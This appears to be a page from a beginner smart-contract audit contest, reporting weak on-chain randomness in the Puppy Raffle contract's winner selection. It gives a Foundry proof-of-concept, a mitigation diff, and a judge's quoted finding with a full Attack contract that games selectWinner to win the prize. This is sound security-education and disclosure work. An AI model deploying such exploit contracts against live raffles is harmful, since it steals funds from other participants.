Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

H-2 Weak Randomness in Winner Selection

H-2 Weak Randomness in Winner Selection

Description

The selectWinner function determines the winner using a hash of on-chain values: the caller's address, the current block timestamp, and the block difficulty. Since all of these values are known to the caller before submitting their transaction, the caller can compute the winner index off-chain and choose not to execute if the result is unfavorable.

// src/PuppyRaffle.sol:128-129
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

The inputs to this calculation are:

  • msg.sender — the caller knows their own address before submitting

  • block.timestamp — deterministic once the block is proposed, and predictable within ~15 seconds

  • block.difficulty — the previous block's difficulty is public, and in PoS this is prevrandao which is also public

Risk

Likelihood:

  • Any caller of selectWinner can simulate the transaction off-chain and observe the winner before committing. If the result is not favorable to them (e.g., they do not win, or a specific target does not win), they simply do not submit the transaction.

  • A validator or miner can additionally influence block.timestamp and block.difficulty to further manipulate the outcome.

Impact:

  • The caller gains the ability to selectively execute selectWinner, allowing them to retry until they obtain a desired outcome. This breaks the fairness guarantee of the raffle.

  • The caller can also front-run other selectWinner calls by observing the mempool and submitting their own call first when the block variables produce a favorable result.

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
import "forge-std/Test.sol";
import "../src/PuppyRaffle.sol";
contract WeakRandomnessTest is Test {
PuppyRaffle raffle;
address feeAddress = address(0xFEE);
uint256 entranceFee = 0.1 ether;
uint256 raffleDuration = 3600;
function setUp() public {
raffle = new PuppyRaffle(entranceFee, feeAddress, raffleDuration);
// Seed the raffle with 4 players
address[] memory players = new address[](4);
players[0] = address(0x1);
players[1] = address(0x2);
players[2] = address(0x3);
players[3] = address(0x4);
raffle.enterRaffle{value: entranceFee * 4}(players);
// Fast-forward past the raffle duration
vm.warp(block.timestamp + raffleDuration + 1);
}
function testCallerCanPredictWinner() public {
// The attacker (this test contract) calls selectWinner.
// They can compute the result before sending the tx:
uint256 predictedIndex =
uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % 4;
// If the attacker does not like the outcome, they simply
// do not submit the transaction. They can try different blocks
// (warp to different timestamps) until a favorable result appears.
// Here we show the prediction matches the actual result:
raffle.selectWinner();
// The winner was determined by the same formula the attacker computed.
}
}

Recommended Mitigation

- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
+ // Use a commit-reveal scheme or Chainlink VRF for unbiasable randomness.
+ // At minimum, do not include msg.sender in the entropy source.
+ uint256 winnerIndex =
+ uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.difficulty, players.length))) % players.length;

The ideal fix is to use Chainlink VRF or a commit-reveal scheme. As a weaker interim measure, remove msg.sender from the hash so the caller cannot predict the result from their own address, and use blockhash(block.number - 1) which is harder to influence.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!